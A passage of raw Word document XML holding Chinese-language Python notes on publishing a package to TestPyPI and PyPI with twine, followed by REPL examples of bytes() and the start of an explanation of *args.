    <w:p w14:paraId="12E61030" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F07AAE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="OLE_LINK30"/>
      <w:r>
        <w:t>https://packaging.python.org/en/latest/tutorials/packaging-projects/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="435"/>
    <w:p w14:paraId="04331803" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>https://docs.python.org/3/tutorial/modules.html#packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CED41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51969900" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，官方推荐你先上传到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>testpypi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器上，再传到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pypi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上。这是两个独立的服务器，账户不共用，但是可以创建同账同密，方便上传。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19786C4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDF442D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pypi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（上传成功可以直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pip install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F473E65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId144" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://pypi.org/account/login/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B31B6E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D42B2D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>testpypi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--index-url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D3530C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://test.pypi.org/project/pypomxml/0.1/#files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7025B9B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725290D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>twine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648AC57E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python3 -m pip install --upgrade pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC760B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m pip install --upgrade twine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD5520D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB977D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="436" w:name="OLE_LINK32"/>
      <w:r>
        <w:t>python setup.py build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sdist</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="436"/>
    <w:p w14:paraId="25375903" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575E7CC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中打包好的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE53947" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m twine upload --repository testpypi dist/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD33CFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="437" w:name="OLE_LINK31"/>
      <w:r>
        <w:t>python3 -m twine upload dist/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="437"/>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6F0AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DBFCFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截图纪念</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768504BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="29C3CE62" wp14:editId="57D15865">
            <wp:extent cx="3982085" cy="2522855"/>
            <wp:effectExtent l="0" t="0" r="10795" b="6985"/>
            <wp:docPr id="3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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3982085" cy="2522855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6813EBE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4CDE25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="15390FE2" wp14:editId="492307E0">
            <wp:extent cx="3673475" cy="1109980"/>
            <wp:effectExtent l="0" t="0" r="14605" b="254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146"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3673475" cy="1109980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F30F41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619CF3F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5FF1EDBF" wp14:editId="5F3A9C44">
            <wp:extent cx="4231005" cy="1278255"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>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146"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4231005" cy="1278255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D487C9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E14EC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="_Toc159779882"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不常见写法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p w14:paraId="33EA9DC6" w14:textId="77777777" w:rsidR="00A817C3" w:rsidRDefault="00A817C3" w:rsidP="00A817C3"/>
    <w:p w14:paraId="5910A819" w14:textId="3203E795" w:rsidR="00A817C3" w:rsidRDefault="00A817C3" w:rsidP="00A817C3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数字字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B6ECC" w14:textId="77777777" w:rsidR="00033E34" w:rsidRPr="00033E34" w:rsidRDefault="00033E34" w:rsidP="009D35E4"/>
    <w:p w14:paraId="5D1F86FB" w14:textId="7EB094DA" w:rsidR="009D35E4" w:rsidRDefault="009D35E4" w:rsidP="009D35E4">
      <w:r>
        <w:t>&gt;&gt;&gt; bytes(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A318A" w14:textId="77777777" w:rsidR="009D35E4" w:rsidRDefault="009D35E4" w:rsidP="009D35E4">
      <w:r>
        <w:t>b'\x00\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B3341" w14:textId="77777777" w:rsidR="009D35E4" w:rsidRDefault="009D35E4" w:rsidP="00EA71FC">
      <w:r>
        <w:t>&gt;&gt;&gt; bytes([2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21F27A" w14:textId="7DB8C141" w:rsidR="00A817C3" w:rsidRDefault="009D35E4" w:rsidP="00A817C3">
      <w:r>
        <w:t>b'\x02'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F092D5" w14:textId="77777777" w:rsidR="00AB5632" w:rsidRDefault="00AB5632" w:rsidP="00AB5632">
      <w:r>
        <w:t>&gt;&gt;&gt; bytes((5))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462CB929" w14:textId="4C3DE64C" w:rsidR="00A817C3" w:rsidRDefault="00AB5632" w:rsidP="00AB5632">
      <w:r>
        <w:t>b'\x00\x00\x00\x00\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4963DEAB" w14:textId="77777777" w:rsidR="00CF747A" w:rsidRDefault="00CF747A" w:rsidP="00CF747A">
      <w:r>
        <w:t>&gt;&gt;&gt; bytes([5,1,256])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17621FAA" w14:textId="77777777" w:rsidR="00CF747A" w:rsidRDefault="00CF747A" w:rsidP="00CF747A">
      <w:r>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65728F" w14:textId="77777777" w:rsidR="00CF747A" w:rsidRDefault="00CF747A" w:rsidP="00CF747A">
      <w:r>
        <w:t xml:space="preserve">  File "&lt;stdin&gt;", line 1, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E89B76" w14:textId="77777777" w:rsidR="00CF747A" w:rsidRDefault="00CF747A" w:rsidP="00CF747A">
      <w:r>
        <w:t>ValueError: bytes must be in range(0, 256)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0CA98" w14:textId="77777777" w:rsidR="00CF747A" w:rsidRPr="00CF747A" w:rsidRDefault="00CF747A" w:rsidP="00CF747A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF747A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; bytes([5,1,255])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE57601" w14:textId="2189030F" w:rsidR="00CF747A" w:rsidRPr="00CF747A" w:rsidRDefault="00CF747A" w:rsidP="00CF747A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF747A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b'\x05\x01\xff'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F4B58" w14:textId="77777777" w:rsidR="00A817C3" w:rsidRDefault="00A817C3" w:rsidP="00A817C3"/>
    <w:p w14:paraId="78C21509" w14:textId="6088165F" w:rsidR="00A817C3" w:rsidRPr="00CF747A" w:rsidRDefault="00AB5632" w:rsidP="00A817C3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF747A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>必须放入</w:t>
      </w:r>
      <w:r w:rsidR="00CF747A" w:rsidRPr="00CF747A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF747A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>列表，他会变</w:t>
      </w:r>
      <w:r w:rsidR="00CF747A" w:rsidRPr="00CF747A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>字节序列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587FF761" w14:textId="77777777" w:rsidR="00A817C3" w:rsidRDefault="00A817C3" w:rsidP="00A817C3"/>
    <w:p w14:paraId="65641B24" w14:textId="229DB5D0" w:rsidR="00AE253C" w:rsidRDefault="00AE253C" w:rsidP="00AE253C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数传参前有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39914A1C" w14:textId="77777777" w:rsidR="00AE253C" w:rsidRDefault="00AE253C" w:rsidP="00AE253C"/>
    <w:p w14:paraId="4011D43A" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>中，函数参数前面的</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>有几种常见用法，分别表示不同的功能：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707980E" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>可变数量的位置参数</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>*args</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961028A" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>在函数定义中，参数前加</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>表示接受任意数量的位置参数，并将这些参数打包成一个元组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB3D7A" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296246E4" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A465CF0" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3868414C" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>def my_function(*args):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DDFD9" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">    for arg in args:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA13623" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">        print(arg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6C04C" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F"/>
    <w:p w14:paraId="642BE672" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">my_function(1, 2, 3)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>传入多个参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03347E28" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD876BD" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4FD899" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58354F4E" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10304891" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275CA55D" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>这里，</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">*args </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>捕获了传入的所有位置参数</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve"> (1, 2, 3) </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>并将它们作为元组传递给函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2840AD97" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
